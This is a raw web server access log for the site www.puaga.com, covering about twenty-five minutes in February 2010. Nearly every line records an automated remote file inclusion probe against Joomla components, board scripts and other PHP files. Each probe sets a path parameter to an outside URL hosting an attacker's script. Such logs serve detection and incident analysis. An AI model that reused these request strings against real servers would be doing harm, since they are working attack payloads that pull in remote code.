218.38.243.44 - - [19/Feb/2010:05:08:00 -0800] "GET /logs/access_100120.log%20//skin/zero_vote/error.php?dir=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:05:08:11 -0800] "GET /logs/access_100115.log//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:05:08:34 -0800] "GET /logs/access_100201.log//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.41 - - [19/Feb/2010:05:12:54 -0800] "GET /delete.php?board_skin_path=http://klmz74.ru/poll/lang/history/t??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
222.231.1.41 - - [19/Feb/2010:05:12:54 -0800] "GET /logs//delete.php?board_skin_path=http://klmz74.ru/poll/lang/history/t??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:14:18 -0800] "GET /include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:14:18 -0800] "GET /logs//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:14:18 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:14:38 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:14:38 -0800] "GET /include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:14:38 -0800] "GET /logs//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:14:55 -0800] "GET /logs//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:14:55 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:14:56 -0800] "GET /include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:15:03 -0800] "GET /logs/access_100129.log%20%20///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:15:03 -0800] "GET /logs///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:15:03 -0800] "GET //ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:15:38 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:15:43 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:16:03 -0800] "GET /logs/access_100127.log%20%20///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:05:16:42 -0800] "GET /bbs/delete_all.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:05:16:42 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:05:16:42 -0800] "GET /logs/access_100202.log%20%20//bbs/delete_all.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:16:54 -0800] "GET //ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:16:54 -0800] "GET /logs///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:17:01 -0800] "GET /logs/access_100121.log%20%20///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:05:17:11 -0800] "GET /logs/access_100129.log%20%20//bbs/delete_all.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:17:49 -0800] "GET //ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:17:49 -0800] "GET /logs///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:17:49 -0800] "GET /logs/access_100129.log///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:17:53 -0800] "GET /logs/access_100115.log//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:18:03 -0800] "GET /logs/access_100127.log///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:05:18:59 -0800] "GET /logs/?sourcedir=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:05:18:59 -0800] "GET /logs/access_100122.log/?sourcedir=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:05:19:00 -0800] "GET /?sourcedir=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:19:32 -0800] "GET /logs///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:19:32 -0800] "GET //ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:19:32 -0800] "GET /logs/access_100129.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:19:32 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:19:32 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:19:34 -0800] "GET //ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:19:34 -0800] "GET /logs///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:19:39 -0800] "GET /logs/access_100121.log%20%20///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:19:41 -0800] "GET /logs/access_100121.log%20%20///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:20:12 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:20:12 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:20:12 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:20:23 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:20:49 -0800] "GET /logs/access_100129.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:20:49 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:20:50 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:21:14 -0800] "GET /logs/access_100114.log//include.php?path[docroot]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:05:21:20 -0800] "GET /logs/access_100122.log%20%20/?sourcedir=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:05:21:20 -0800] "GET /logs/?sourcedir=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:05:21:20 -0800] "GET /?sourcedir=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:21:26 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:21:26 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:21:26 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:21:37 -0800] "GET /logs/access_100129.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:21:37 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:21:37 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:22:48 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:23:06 -0800] "GET /logs/access_100127.log///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:23:06 -0800] "GET //ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:23:06 -0800] "GET /logs///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [19/Feb/2010:05:23:24 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [19/Feb/2010:05:23:24 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [19/Feb/2010:05:23:24 -0800] "GET /logs/access_100111.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [19/Feb/2010:05:24:33 -0800] "GET /galeria.php?start=0&kategoria=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [19/Feb/2010:05:24:34 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:24:42 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:24:42 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:24:42 -0800] "GET /logs/access_100127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:12 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:12 -0800] "GET /logs/access_100121.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:12 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:17 -0800] "GET /logs/access_100121.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:30 -0800] "GET /logs/access_100127.log///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:30 -0800] "GET /logs///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:30 -0800] "GET //ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:45 -0800] "GET //ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:45 -0800] "GET /logs///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:25:45 -0800] "GET /logs/access_100127.log///ktmlstandard/includes/ktedit/index.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:05:26:06 -0800] "GET /logs/access_100202.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:05:26:06 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:05:26:06 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [19/Feb/2010:05:26:06 -0800] "GET /logs/access_100125.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:05:26:19 -0800] "GET /logs/access_100127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [19/Feb/2010:05:27:43 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [19/Feb/2010:05:27:43 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [19/Feb/2010:05:27:44 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:28:49 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:28:49 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:28:49 -0800] "GET /logs/access_100207.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [19/Feb/2010:05:28:57 -0800] "GET /logs/access_100115.log//galeria.php?start=0&kategoria=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [19/Feb/2010:05:28:57 -0800] "GET /logs/access_100201.log//galeria.php?start=0&kategoria=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:29:17 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:29:17 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:29:18 -0800] "GET /logs/access_100207.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:29:18 -0800] "GET /logs/access_100201.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [19/Feb/2010:05:31:31 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [19/Feb/2010:05:31:31 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [19/Feb/2010:05:31:32 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:43 -0800] "GET /logs/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:43 -0800] "GET /errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:43 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:49 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:49 -0800] "GET /logs/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:49 -0800] "GET /errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:54 -0800] "GET /errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:54 -0800] "GET /logs/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:31:55 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [19/Feb/2010:05:32:14 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [19/Feb/2010:05:32:14 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [19/Feb/2010:05:32:14 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:05:33:23 -0800] "GET /logs/access_100126.log%20%20/?sourcedir=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:33:47 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:33:47 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:33:47 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
